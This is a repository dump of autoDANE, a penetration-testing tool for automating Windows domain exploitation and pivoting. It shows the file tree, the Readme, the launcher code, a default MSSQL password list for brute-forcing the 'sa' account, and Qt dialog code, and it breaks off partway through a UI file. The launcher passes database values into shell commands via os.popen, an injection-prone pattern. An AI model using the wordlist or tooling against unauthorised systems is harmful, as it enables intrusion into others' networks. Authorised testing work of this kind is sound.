├── Readme.md
├── __init__.py
├── asyncproc.py
├── autodane.e4p
├── autodane.py
├── createdb.sql
├── createdbstructure.sql
├── creds
├── mssql_passes
└── mssql_users
├── images
├── confirm.png
├── db-connection.jpg
├── email.png
├── logo.png
├── refresh.ico
└── skype.png
├── initialoptions
├── Ui_choosefootprint.py
├── __init__.py
├── choosefootprint.py
└── choosefootprint.ui
├── inputwindows
├── Ui_adddomaincreds.py
├── Ui_addhost.py
├── Ui_addport.py
├── Ui_confirmation.py
├── Ui_newtask.py
├── Ui_newtrigger.py
├── Ui_textinput.py
├── __init__.py
├── adddomaincreds.py
├── adddomaincreds.ui
├── addhost.py
├── addhost.ui
├── addport.py
├── addport.ui
├── confirmation.py
├── confirmation.ui
├── newtask.py
├── newtask.ui
├── newtrigger.py
├── newtrigger.py2
├── newtrigger.ui
├── textinput.py
└── textinput.ui
├── install
├── main
├── Ui_mainwindow.py
├── __init__.py
├── mainwindow.py
└── mainwindow.ui
├── msf
├── .exploit.py.swn
├── .exploit.py.swo
├── .exploit.py.swp
├── __init__.py
└── exploit.py
├── plugins
├── __init__.py
├── domain_enumeration
│ ├── .buenumerate_users_and_groups.py.swp
│ ├── .enumerate_groups.py.swo
│ ├── .enumerate_groups.py.swp
│ ├── .enumerate_users.py.swo
│ ├── .enumerate_users.py.swp
│ ├── __init__.py
│ ├── bruteforce_ntlm_hashes.py
│ ├── enumerate_groups.py
│ ├── enumerate_users.py
│ └── extract_domain_hashes.py
├── footprinting
│ ├── __init__.py
│ ├── host_dns_lookup.py
│ ├── net_range_dns_lookup.py
│ ├── portscan_host.py
│ ├── portscan_net_range.py
│ ├── portscan_scoped_host.py
│ ├── portscan_scoped_range.py
│ ├── query_mssql_discovery_service.py
│ ├── scoped_range_dns_lookup.py
│ └── screenshot_website.py
├── host_enumeration
│ ├── __init__.py
│ ├── add_local_ip.py
│ ├── add_local_nameservers.py
│ └── zone_transfer_assigned_domain.py
├── pivoting
│ ├── __init__.py
│ ├── psexec_domain_account.py
│ ├── psexec_local_account.py
│ ├── retry_domain_accounts.py
│ ├── retry_local_accounts.py
│ └── verify_domain_credentials.py
├── vuln_exploits
│ ├── __init__.py
│ ├── exploit_ms08_067.py
│ ├── exploit_weak_sql_creds.py
│ └── exploit_weak_tomcat_creds.py
└── vuln_scanning
│ ├── __init__.py
│ ├── ms08_067.py
│ ├── weak_sql_creds.py
│ └── weak_tomcat_creds.py
├── settings.ini
├── software
├── .adsmbexec.py.swp
├── adsecretsdump.py
├── adsmbexec.py
├── metasploit
│ └── modules
│ │ └── post
│ │ └── windows
│ │ ├── gather
│ │ └── sp_smart_hashdump.rb
│ │ └── manage
│ │ └── sp_smart_migrate.rb
├── mimikatz_trunk
│ ├── README.md
│ ├── Win32
│ │ ├── mimidrv.sys
│ │ ├── mimikatz.exe
│ │ └── mimilib.dll
│ └── x64
│ │ ├── mimidrv.sys
│ │ ├── mimikatz.exe
│ │ └── mimilib.dll
├── ms08-067_check
│ ├── COPYING
│ ├── ms08-067.nse
│ ├── ms08-067_check.py
│ ├── ndr.py
│ └── ndr.pyc
├── test.txt
├── tomcat_check
│ └── tomcat-scan.nse
└── wce
│ ├── test.txt
│ └── wce.exe
├── splash
├── Ui_dbconnecting.py
├── __init__.py
├── dbconnecting.py
└── dbconnecting.ui
├── truncate
├── truncate.sql
└── worker
├── .workerthread.py.swo
├── .workerthread.py.swp
├── __init__.py
└── workerthread.py
/Readme.md:
--------------------------------------------------------------------------------
1 | Auto Domain Admin and Network Exploitation (autoDANE)
2 | by dane at sensepost dot com
3 |
4 | First released at ZaCon 2015 3 Oct 2015
5 |
6 | About
7 | -----
8 |
9 | Auto DANE attempts to automate the process of exploiting, pivoting and escalating privileges on windows domains.
10 |
11 | Installing
12 | ----------
13 |
14 | Run install.sh. This will install all the prerequisites
15 |
16 | Running
17 | -------
18 |
19 | After that, simply run ./autodane.py
20 |
21 | License
22 | -------
23 |
24 | autodane is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0/) Permissions beyond the scope of this license may be available at http://sensepost.com/contact_us/.
25 |
--------------------------------------------------------------------------------
/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/__init__.py
--------------------------------------------------------------------------------
/autodane.e4p:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | en_US
8 | 1135dcb6d9ca37f4dc87815c847bdbb12e5b4250
9 | Python2
10 | Qt4
11 |
12 | 0.1
13 |
14 |
15 |
16 |
17 | splash/Ui_dbconnecting.py
18 | initialoptions/Ui_choosefootprint.py
19 | autodane.py
20 | main/Ui_mainwindow.py
21 | splash/dbconnecting.py
22 | worker/workerthread.py
23 | plugins/host_enumeration/add_local_ip.py
24 | plugins/footprinting/portscan_host.py
25 | plugins/footprinting/portscan_net_range.py
26 | settings.ini
27 | inputwindows/Ui_newtrigger.py
28 | inputwindows/Ui_newtask.py
29 | inputwindows/newtask.py
30 | inputwindows/newtrigger.py
31 | plugins/footprinting/host_dns_lookup.py
32 | plugins/host_enumeration/add_local_nameservers.py
33 | plugins/footprinting/screenshot_website.py
34 | plugins/vuln_scanning/ms08_067.py
35 | plugins/vuln_exploits/exploit_ms08_067.py
36 | msf/exploit.py
37 | plugins/pivoting/retry_local_accounts.py
38 | plugins/pivoting/psexec_local_account.py
39 | plugins/footprinting/portscan_scoped_host.py
40 | plugins/vuln_scanning/weak_sql_creds.py
41 | plugins/vuln_exploits/exploit_weak_sql_creds.py
42 | plugins/vuln_exploits/exploit_weak_tomcat_creds.py
43 | plugins/pivoting/retry_domain_accounts.py
44 | plugins/pivoting/psexec_domain_account.py
45 | plugins/footprinting/portscan_scoped_range.py
46 | plugins/pivoting/verify_domain_credentials.py
47 | plugins/vuln_scanning/weak_tomcat_creds.py
48 | plugins/domain_enumeration/extract_domain_hashes.py
49 | initialoptions/choosefootprint.py
50 | main/mainwindow.py
51 | plugins/domain_enumeration/bruteforce_ntlm_hashes.py
52 | inputwindows/Ui_confirmation.py
53 | inputwindows/confirmation.py
54 | plugins/footprinting/net_range_dns_lookup.py
55 | plugins/footprinting/scoped_range_dns_lookup.py
56 | plugins/host_enumeration/zone_transfer_assigned_domain.py
57 | inputwindows/Ui_adddomaincreds.py
58 | inputwindows/adddomaincreds.py
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | splash/Ui_dbconnecting.py
74 |
75 | autodane.py
76 |
77 | None
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
--------------------------------------------------------------------------------
/autodane.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | from PyQt4 import *
4 | from PyQt4.QtCore import *
5 | from PyQt4.QtGui import QApplication
6 |
7 | from splash.dbconnecting import DBConnecting
8 | from initialoptions.choosefootprint import ChooseFootprint
9 | from main.mainwindow import MainWindow
10 |
11 | import sys
12 | import os
13 | import psycopg2
14 | import ConfigParser
15 | import thread
16 | import datetime
17 |
18 | def main():
19 | app = QApplication(sys.argv)
20 | # app.setStyle("cleanlooks")
21 | # plastique
22 | # cde
23 | # motif
24 | # sgi
25 | # windows
26 | # cleanlooks
27 | # mac
28 |
29 | wndDBConnecting = DBConnecting()
30 | wndChooseFootprint = ChooseFootprint()
31 | wndMainWindow = MainWindow()
32 |
33 | conf = ConfigParser.ConfigParser()
34 | conf.read("settings.ini")
35 |
36 | showSplash = False
37 | runApp = True
38 |
39 | try:
40 | psycopg2.connect(host=conf.get('postgres', 'host'), user=conf.get('postgres', 'user'), password=conf.get('postgres', 'pass'), dbname=conf.get('postgres', 'db'))
41 | showSplash = False
42 | except:
43 | showSplash = True
44 |
45 | if showSplash is True:
46 | runApp = wndDBConnecting.exec_()
47 |
48 | if runApp:
49 | db = psycopg2.connect(host=conf.get('postgres', 'host'), user=conf.get('postgres', 'user'), password=conf.get('postgres', 'pass'), dbname=conf.get('postgres', 'db'))
50 | db.autocommit = True
51 |
52 | cursor = db.cursor()
53 | cursor.execute(
54 | "select footprint_name from footprints order by footprint_name")
55 |
56 | footprints_list = [""]
57 | for row in cursor.fetchall():
58 | footprints_list.append(row[0])
59 |
60 | cursor.close()
61 |
62 | wndChooseFootprint.setFootprints(footprints_list)
63 | wndChooseFootprint.db = db
64 | wndChooseFootprint.updateUI()
65 |
66 | if wndChooseFootprint.exec_():
67 | cursor = db.cursor()
68 | cursor.execute(
69 | "update task_list set in_progress = false where in_progress = true")
70 | cursor.close()
71 |
72 | cursor = db.cursor()
73 | cursor.execute("select createFootprint(%s);", (str(
74 | wndChooseFootprint.txtFootprintName.text()), ))
75 | footprint_id = cursor.fetchone()[0]
76 | cursor.close()
77 |
78 | wndMainWindow.setWindowTitle("autodane : {0}".format(
79 | wndChooseFootprint.txtFootprintName.text()))
80 |
81 | wndMainWindow.db = db
82 | wndMainWindow.footprint_id = footprint_id
83 |
84 | # wndMainWindow.on_btnUpdateSummary_clicked()
85 | # wndMainWindow.on_btnUpdateHosts_clicked()
86 | # wndMainWindow.on_btnUpdateDomains_clicked()
87 | # wndMainWindow.on_btnUpdateCreds_clicked()
88 | # wndMainWindow.on_btnUpdateTaskList_clicked()
89 | # wndMainWindow.on_btnUpdateTaskLogs_clicked()
90 | # wndMainWindow.updateWebsites()
91 |
92 | # wndMainWindow.show()
93 |
94 | for item in wndChooseFootprint.txtExclude.toPlainText().split("\n"):
95 | if item != "":
96 | cursor = db.cursor()
97 | cursor.execute("select addScopeItem(%s, %s, %s)",
98 | (footprint_id, 3, str(item), ))
99 | cursor.close()
100 |
101 | cursor = db.cursor()
102 | cursor.execute(
103 | "select item_value from scope where footprint_id = %s and item_type = 3", (footprint_id, ))
104 | os.popen('echo "" > temp/exclude_list')
105 | for row in cursor.fetchall():
106 | os.popen("echo {0} >> temp/exclude_list".format(row[0]))
107 | cursor.close()
108 |
109 | # TODO: call these in a thread, so they can take as long as they
110 | # need to
111 | for item in wndChooseFootprint.txtKnownHosts.toPlainText().split("\n"):
112 | if item != "":
113 | cursor = db.cursor()
114 | cursor.execute("select addScopeItem(%s, %s, %s)",
115 | (footprint_id, 1, str(item), ))
116 | cursor.close()
117 |
118 | for item in wndChooseFootprint.txtKnownDCs.toPlainText().split("\n"):
119 | if item != "":
120 | cursor = db.cursor()
121 | cursor.execute(
122 | "select addHost(%s, %s::varchar, ''::varchar, true)", (footprint_id, str(item), ))
123 | cursor.close()
124 |
125 | for item in wndChooseFootprint.txtKnownRanges.toPlainText().split("\n"):
126 | if item != "":
127 | octs = item.split(".")
128 | if octs[3] == "0/24":
129 | # print "add range: {0}".format(item)
130 | cursor = db.cursor()
131 | cursor.execute(
132 | "select addScopeItem(%s, %s, %s)", (footprint_id, 2, str(item), ))
133 | cursor.close()
134 | elif item.split(".")[3] == "0/16":
135 | for oct2 in range(0, 256):
136 | cursor = db.cursor()
137 | cursor.execute("select addScopeItem(%s, %s, %s)", (
138 | footprint_id, 2, "{0}.{1}.{2}.0/24".format(octs[0], octs[1], oct2), ))
139 | cursor.close()
140 | else:
141 | cursor = db.cursor()
142 | cursor.execute(
143 | "select addScopeItem(%s, %s, %s)", (footprint_id, 2, str(item), ))
144 | cursor.close()
145 | # elif item.split(".")[3] == "0/8":
146 | # for oct1 in range(0, 256):
147 | # for oct2 in range(0, 256):
148 | # print "{0}.{1}.{2}.0/24".format(octs[0], oct1, oct2)
149 |
150 | for row in xrange(0, wndChooseFootprint.tblDomainCreds.rowCount()):
151 | domain = wndChooseFootprint.tblDomainCreds.item(row, 0).text()
152 | username = wndChooseFootprint.tblDomainCreds.item(
153 | row, 1).text()
154 | password = wndChooseFootprint.tblDomainCreds.item(
155 | row, 2).text()
156 | lm_hash = wndChooseFootprint.tblDomainCreds.item(row, 3).text()
157 | ntlm_hash = wndChooseFootprint.tblDomainCreds.item(
158 | row, 4).text()
159 | valid = (wndChooseFootprint.tblDomainCreds.item(
160 | row, 5).text() == "True")
161 | cursor = db.cursor()
162 | cursor.execute("select addDomainCreds(%s, %s, %s, %s, %s, %s, %s)", (footprint_id, 0, str(
163 | domain), str(username), str(password), str(lm_hash), str(ntlm_hash), ))
164 | cursor.close()
165 |
166 | if valid is True:
167 | cursor = db.cursor()
168 | cursor.execute("update domain_credentials set verified = true, valid = true where footprint_id = %s and domain = %s and username = %s", (
169 | footprint_id, str(domain), str(username), ))
170 | cursor.close()
171 |
172 | #print "on_btnUpdateSummary_clicked " + str(datetime.datetime.now())
173 | wndMainWindow.on_btnUpdateSummary_clicked()
174 |
175 | #print "on_btnUpdateHosts_clicked " + str(datetime.datetime.now())
176 | wndMainWindow.on_btnUpdateHosts_clicked()
177 |
178 | #print "on_btnRefreshVulnerabilitiesTab_clicked " + str(datetime.datetime.now())
179 | wndMainWindow.on_btnRefreshVulnerabilitiesTab_clicked()
180 |
181 | #print "on_btnUpdateDomains_clicked " + str(datetime.datetime.now())
182 | wndMainWindow.on_btnUpdateDomains_clicked()
183 |
184 | #print "on_btnUpdateCreds_clicked " + str(datetime.datetime.now())
185 | wndMainWindow.on_btnUpdateCreds_clicked()
186 |
187 | #print "on_btnUpdateTaskList_clicked " + str(datetime.datetime.now())
188 | wndMainWindow.on_btnUpdateTaskList_clicked()
189 |
190 | #print "setupFilterCombos " + str(datetime.datetime.now())
191 | wndMainWindow.setupFilterCombos()
192 |
193 | #print "on_btnSearchLogs_clicked " + str(datetime.datetime.now())
194 | # wndMainWindow.on_btnSearchLogs_clicked()
195 |
196 | #print "updateWebsites " + str(datetime.datetime.now())
197 | wndMainWindow.updateWebsites()
198 |
199 | wndMainWindow.show()
200 |
201 | if wndChooseFootprint.sldTestDepth.value() > 0:
202 | for i in wndChooseFootprint.enumerationPlugins:
203 | if wndChooseFootprint.enumerationPlugins[i][3] is True:
204 | cursor = db.cursor()
205 | # TODO add logic to check whether these tasks have been done before adding them
206 | # otherwise the same thing will be run each time the
207 | # app is opened
208 | cursor.execute("insert into task_list (footprint_id, task_descriptions_id, item_identifier) values (%s, %s, 0)", (
209 | footprint_id, wndChooseFootprint.enumerationPlugins[i][0], ))
210 | cursor.close()
211 |
212 | nmap_timing = wndChooseFootprint.cmbNmapTiming.currentText()
213 | network_interface = wndChooseFootprint.cmbNetworkInterface.currentText()
214 | thread_counts = {}
215 | thread_counts['all'] = wndChooseFootprint.sedAllTasks.value()
216 | thread_counts['footprinting'] = wndChooseFootprint.sedFootprinting.value()
217 | thread_counts['exploits'] = wndChooseFootprint.sedExploits.value()
218 | thread_counts['pivoting'] = wndChooseFootprint.sedPivoting.value()
219 | thread_counts['pivoting_msf'] = wndChooseFootprint.sedPivotingMsf.value()
220 | thread_counts['domain_enumeration'] = wndChooseFootprint.sedDomainEnumeration.value()
221 |
222 | thread.start_new_thread(wndMainWindow.startWork, (wndChooseFootprint.sldTestDepth.value(), nmap_timing, network_interface, thread_counts))
223 | else:
224 | quit()
225 | else:
226 | quit()
227 |
228 | sys.exit(app.exec_())
229 |
230 | if __name__ == '__main__':
231 | main()
232 |
--------------------------------------------------------------------------------
/createdb.sql:
--------------------------------------------------------------------------------
1 | create database autodane;
2 |
--------------------------------------------------------------------------------
/creds/mssql_passes:
--------------------------------------------------------------------------------
1 |
2 | admin
3 | master
4 | password
5 | password123
6 | Password1
7 | Pa$$w0rd
8 | P@ssw0rd
9 | P@..w0rd
10 | s3rvic3s
11 | s3rvices.123
12 | sa
13 | test
14 | zaq12wsx
15 | 1qaz2wsx
16 |
--------------------------------------------------------------------------------
/creds/mssql_users:
--------------------------------------------------------------------------------
1 | sa
2 |
--------------------------------------------------------------------------------
/images/confirm.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/images/confirm.png
--------------------------------------------------------------------------------
/images/db-connection.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/images/db-connection.jpg
--------------------------------------------------------------------------------
/images/email.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/images/email.png
--------------------------------------------------------------------------------
/images/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/images/logo.png
--------------------------------------------------------------------------------
/images/refresh.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/images/refresh.ico
--------------------------------------------------------------------------------
/images/skype.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/images/skype.png
--------------------------------------------------------------------------------
/initialoptions/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/initialoptions/__init__.py
--------------------------------------------------------------------------------
/inputwindows/Ui_adddomaincreds.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/home/dane/projects/autodane/autodane_pg/inputwindows/adddomaincreds.ui'
4 | #
5 | # Created by: PyQt4 UI code generator 4.11.4
6 | #
7 | # WARNING! All changes made in this file will be lost!
8 |
9 | from PyQt4 import QtCore, QtGui
10 |
11 | try:
12 | _fromUtf8 = QtCore.QString.fromUtf8
13 | except AttributeError:
14 | def _fromUtf8(s):
15 | return s
16 |
17 | try:
18 | _encoding = QtGui.QApplication.UnicodeUTF8
19 | def _translate(context, text, disambig):
20 | return QtGui.QApplication.translate(context, text, disambig, _encoding)
21 | except AttributeError:
22 | def _translate(context, text, disambig):
23 | return QtGui.QApplication.translate(context, text, disambig)
24 |
25 | class Ui_Dialog(object):
26 | def setupUi(self, Dialog):
27 | Dialog.setObjectName(_fromUtf8("Dialog"))
28 | Dialog.resize(668, 398)
29 | Dialog.setSizeGripEnabled(True)
30 | self.gridLayout = QtGui.QGridLayout(Dialog)
31 | self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
32 | self.verticalLayout = QtGui.QVBoxLayout()
33 | self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
34 | self.horizontalLayout = QtGui.QHBoxLayout()
35 | self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
36 | self.label = QtGui.QLabel(Dialog)
37 | self.label.setMinimumSize(QtCore.QSize(100, 0))
38 | self.label.setObjectName(_fromUtf8("label"))
39 | self.horizontalLayout.addWidget(self.label)
40 | self.txtDomain = QtGui.QLineEdit(Dialog)
41 | self.txtDomain.setObjectName(_fromUtf8("txtDomain"))
42 | self.horizontalLayout.addWidget(self.txtDomain)
43 | self.verticalLayout.addLayout(self.horizontalLayout)
44 | self.horizontalLayout_2 = QtGui.QHBoxLayout()
45 | self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
46 | self.label_2 = QtGui.QLabel(Dialog)
47 | self.label_2.setMinimumSize(QtCore.QSize(100, 0))
48 | self.label_2.setObjectName(_fromUtf8("label_2"))
49 | self.horizontalLayout_2.addWidget(self.label_2)
50 | self.txtUsername = QtGui.QLineEdit(Dialog)
51 | self.txtUsername.setObjectName(_fromUtf8("txtUsername"))
52 | self.horizontalLayout_2.addWidget(self.txtUsername)
53 | self.verticalLayout.addLayout(self.horizontalLayout_2)
54 | self.horizontalLayout_3 = QtGui.QHBoxLayout()
55 | self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
56 | self.label_3 = QtGui.QLabel(Dialog)
57 | self.label_3.setMinimumSize(QtCore.QSize(100, 0))
58 | self.label_3.setObjectName(_fromUtf8("label_3"))
59 | self.horizontalLayout_3.addWidget(self.label_3)
60 | self.txtPassword = QtGui.QLineEdit(Dialog)
61 | self.txtPassword.setObjectName(_fromUtf8("txtPassword"))
62 | self.horizontalLayout_3.addWidget(self.txtPassword)
63 | self.verticalLayout.addLayout(self.horizontalLayout_3)
64 | self.horizontalLayout_4 = QtGui.QHBoxLayout()
65 | self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
66 | self.label_4 = QtGui.QLabel(Dialog)
67 | self.label_4.setMinimumSize(QtCore.QSize(100, 0))
68 | self.label_4.setObjectName(_fromUtf8("label_4"))
69 | self.horizontalLayout_4.addWidget(self.label_4)
70 | self.txtLMHash = QtGui.QLineEdit(Dialog)
71 | self.txtLMHash.setObjectName(_fromUtf8("txtLMHash"))
72 | self.horizontalLayout_4.addWidget(self.txtLMHash)
73 | self.verticalLayout.addLayout(self.horizontalLayout_4)
74 | self.horizontalLayout_5 = QtGui.QHBoxLayout()
75 | self.horizontalLayout_5.setObjectName(_fromUtf8("horizontalLayout_5"))
76 | self.label_5 = QtGui.QLabel(Dialog)
77 | self.label_5.setMinimumSize(QtCore.QSize(100, 0))
78 | self.label_5.setObjectName(_fromUtf8("label_5"))
79 | self.horizontalLayout_5.addWidget(self.label_5)
80 | self.txtNTLMHash = QtGui.QLineEdit(Dialog)
81 | self.txtNTLMHash.setObjectName(_fromUtf8("txtNTLMHash"))
82 | self.horizontalLayout_5.addWidget(self.txtNTLMHash)
83 | self.verticalLayout.addLayout(self.horizontalLayout_5)
84 | self.cbxCheckAgainstDC = QtGui.QCheckBox(Dialog)
85 | self.cbxCheckAgainstDC.setChecked(False)
86 | self.cbxCheckAgainstDC.setObjectName(_fromUtf8("cbxCheckAgainstDC"))
87 | self.verticalLayout.addWidget(self.cbxCheckAgainstDC)
88 | spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
89 | self.verticalLayout.addItem(spacerItem)
90 | self.horizontalLayout_6 = QtGui.QHBoxLayout()
91 | self.horizontalLayout_6.setObjectName(_fromUtf8("horizontalLayout_6"))
92 | spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
93 | self.horizontalLayout_6.addItem(spacerItem1)
94 | self.btnOK = QtGui.QPushButton(Dialog)
95 | self.btnOK.setObjectName(_fromUtf8("btnOK"))
96 | self.horizontalLayout_6.addWidget(self.btnOK)
97 | self.btnCancel = QtGui.QPushButton(Dialog)
98 | self.btnCancel.setObjectName(_fromUtf8("btnCancel"))
99 | self.horizontalLayout_6.addWidget(self.btnCancel)
100 | self.verticalLayout.addLayout(self.horizontalLayout_6)
101 | self.gridLayout.addLayout(self.verticalLayout, 0, 0, 1, 1)
102 |
103 | self.retranslateUi(Dialog)
104 | QtCore.QMetaObject.connectSlotsByName(Dialog)
105 |
106 | def retranslateUi(self, Dialog):
107 | Dialog.setWindowTitle(_translate("Dialog", "Add Domain Creds", None))
108 | self.label.setText(_translate("Dialog", "Domain", None))
109 | self.label_2.setText(_translate("Dialog", "Username", None))
110 | self.label_3.setText(_translate("Dialog", "Password", None))
111 | self.label_4.setText(_translate("Dialog", "LM Hash", None))
112 | self.label_5.setText(_translate("Dialog", "NTLM Hash", None))
113 | self.cbxCheckAgainstDC.setText(_translate("Dialog", "Verified. Check this if you\'re sure the password is correct", None))
114 | self.btnOK.setText(_translate("Dialog", "OK", None))
115 | self.btnCancel.setText(_translate("Dialog", "Cancel", None))
116 |
117 |
118 | if __name__ == "__main__":
119 | import sys
120 | app = QtGui.QApplication(sys.argv)
121 | Dialog = QtGui.QDialog()
122 | ui = Ui_Dialog()
123 | ui.setupUi(Dialog)
124 | Dialog.show()
125 | sys.exit(app.exec_())
126 |
127 |
--------------------------------------------------------------------------------
/inputwindows/Ui_addhost.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/root/Projects/autoDANE/inputwindows/addhost.ui'
4 | #
5 | # Created: Wed Feb 17 14:40:17 2016
6 | # by: PyQt4 UI code generator 4.11.2
7 | #
8 | # WARNING! All changes made in this file will be lost!
9 |
10 | from PyQt4 import QtCore, QtGui
11 |
12 | try:
13 | _fromUtf8 = QtCore.QString.fromUtf8
14 | except AttributeError:
15 | def _fromUtf8(s):
16 | return s
17 |
18 | try:
19 | _encoding = QtGui.QApplication.UnicodeUTF8
20 | def _translate(context, text, disambig):
21 | return QtGui.QApplication.translate(context, text, disambig, _encoding)
22 | except AttributeError:
23 | def _translate(context, text, disambig):
24 | return QtGui.QApplication.translate(context, text, disambig)
25 |
26 | class Ui_Dialog(object):
27 | def setupUi(self, Dialog):
28 | Dialog.setObjectName(_fromUtf8("Dialog"))
29 | Dialog.resize(465, 151)
30 | Dialog.setSizeGripEnabled(True)
31 | self.gridLayout = QtGui.QGridLayout(Dialog)
32 | self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
33 | self.verticalLayout = QtGui.QVBoxLayout()
34 | self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
35 | self.horizontalLayout = QtGui.QHBoxLayout()
36 | self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
37 | self.label = QtGui.QLabel(Dialog)
38 | self.label.setObjectName(_fromUtf8("label"))
39 | self.horizontalLayout.addWidget(self.label)
40 | self.txtIPAddress = QtGui.QLineEdit(Dialog)
41 | self.txtIPAddress.setObjectName(_fromUtf8("txtIPAddress"))
42 | self.horizontalLayout.addWidget(self.txtIPAddress)
43 | self.verticalLayout.addLayout(self.horizontalLayout)
44 | spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
45 | self.verticalLayout.addItem(spacerItem)
46 | self.horizontalLayout_2 = QtGui.QHBoxLayout()
47 | self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
48 | spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
49 | self.horizontalLayout_2.addItem(spacerItem1)
50 | self.btnOK = QtGui.QPushButton(Dialog)
51 | self.btnOK.setObjectName(_fromUtf8("btnOK"))
52 | self.horizontalLayout_2.addWidget(self.btnOK)
53 | self.btnCancel = QtGui.QPushButton(Dialog)
54 | self.btnCancel.setObjectName(_fromUtf8("btnCancel"))
55 | self.horizontalLayout_2.addWidget(self.btnCancel)
56 | self.verticalLayout.addLayout(self.horizontalLayout_2)
57 | self.gridLayout.addLayout(self.verticalLayout, 0, 0, 1, 1)
58 |
59 | self.retranslateUi(Dialog)
60 | QtCore.QMetaObject.connectSlotsByName(Dialog)
61 |
62 | def retranslateUi(self, Dialog):
63 | Dialog.setWindowTitle(_translate("Dialog", "Add Host", None))
64 | self.label.setText(_translate("Dialog", "IP Address", None))
65 | self.btnOK.setText(_translate("Dialog", "OK", None))
66 | self.btnCancel.setText(_translate("Dialog", "Cancel", None))
67 |
68 |
69 | if __name__ == "__main__":
70 | import sys
71 | app = QtGui.QApplication(sys.argv)
72 | Dialog = QtGui.QDialog()
73 | ui = Ui_Dialog()
74 | ui.setupUi(Dialog)
75 | Dialog.show()
76 | sys.exit(app.exec_())
77 |
78 |
--------------------------------------------------------------------------------
/inputwindows/Ui_addport.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/home/dane/projects/autodane/autodane_pg/inputwindows/addport.ui'
4 | #
5 | # Created by: PyQt4 UI code generator 4.11.4
6 | #
7 | # WARNING! All changes made in this file will be lost!
8 |
9 | from PyQt4 import QtCore, QtGui
10 |
11 | try:
12 | _fromUtf8 = QtCore.QString.fromUtf8
13 | except AttributeError:
14 | def _fromUtf8(s):
15 | return s
16 |
17 | try:
18 | _encoding = QtGui.QApplication.UnicodeUTF8
19 | def _translate(context, text, disambig):
20 | return QtGui.QApplication.translate(context, text, disambig, _encoding)
21 | except AttributeError:
22 | def _translate(context, text, disambig):
23 | return QtGui.QApplication.translate(context, text, disambig)
24 |
25 | class Ui_Dialog(object):
26 | def setupUi(self, Dialog):
27 | Dialog.setObjectName(_fromUtf8("Dialog"))
28 | Dialog.resize(478, 164)
29 | Dialog.setSizeGripEnabled(True)
30 | self.verticalLayout = QtGui.QVBoxLayout(Dialog)
31 | self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
32 | self.horizontalLayout = QtGui.QHBoxLayout()
33 | self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
34 | self.label = QtGui.QLabel(Dialog)
35 | self.label.setMaximumSize(QtCore.QSize(100, 16777215))
36 | self.label.setObjectName(_fromUtf8("label"))
37 | self.horizontalLayout.addWidget(self.label)
38 | self.sbPort = QtGui.QSpinBox(Dialog)
39 | self.sbPort.setMaximum(65535)
40 | self.sbPort.setObjectName(_fromUtf8("sbPort"))
41 | self.horizontalLayout.addWidget(self.sbPort)
42 | self.verticalLayout.addLayout(self.horizontalLayout)
43 | spacerItem = QtGui.QSpacerItem(20, 73, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
44 | self.verticalLayout.addItem(spacerItem)
45 | self.horizontalLayout_2 = QtGui.QHBoxLayout()
46 | self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
47 | spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
48 | self.horizontalLayout_2.addItem(spacerItem1)
49 | self.btnOK = QtGui.QPushButton(Dialog)
50 | self.btnOK.setObjectName(_fromUtf8("btnOK"))
51 | self.horizontalLayout_2.addWidget(self.btnOK)
52 | self.btnCancel = QtGui.QPushButton(Dialog)
